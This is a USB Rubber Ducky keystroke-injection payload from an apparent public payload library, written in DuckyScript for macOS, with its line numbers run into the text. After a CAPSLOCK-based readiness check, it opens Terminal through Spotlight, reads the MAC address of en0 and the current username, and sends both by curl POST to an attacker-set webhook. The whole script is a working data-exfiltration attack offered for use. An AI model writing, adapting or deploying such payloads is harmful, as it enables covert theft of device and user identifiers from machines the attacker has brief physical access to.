Path: blob/master/payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/payload.txt
2968 views
REM_BLOCK1####################################################2# #3# Title : Exfiltrate Mac Address - MacOS #4# Author : bst04 - Aleff #5# Version : 1.0 #6# Category : Exfiltration #7# Target : MacOS #8# #9####################################################10END_REM1112REM Set the #WEBHOOK to complete the exfiltration13DEFINE #WEBHOOK example1415EXTENSION DETECT_READY16REM VERSION 1.117REM AUTHOR: Korben1819REM_BLOCK DOCUMENTATION20USAGE:21Extension runs inline (here)22Place at beginning of payload (besides ATTACKMODE) to act as dynamic23boot delay2425TARGETS:26Any system that reflects CAPSLOCK will detect minimum required delay27Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms28END_REM2930REM CONFIGURATION:31DEFINE #RESPONSE_DELAY 2532DEFINE #ITERATION_LIMIT 1203334VAR $C = 035WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))36CAPSLOCK37DELAY #RESPONSE_DELAY38$C = ($C + 1)39END_WHILE40CAPSLOCK41END_EXTENSION4243REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready44DELAY 2004546GUI SPACE47DELAY 25048STRINGLN TERMINAL49DELAY 75050STRINGLN mac=$(networksetup -getmacaddress en0)51DELAY 75052STRINGLN name=$(id -un)53DELAY 85054STRINGLN curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=User:$name | $mac" #WEBHOOK555657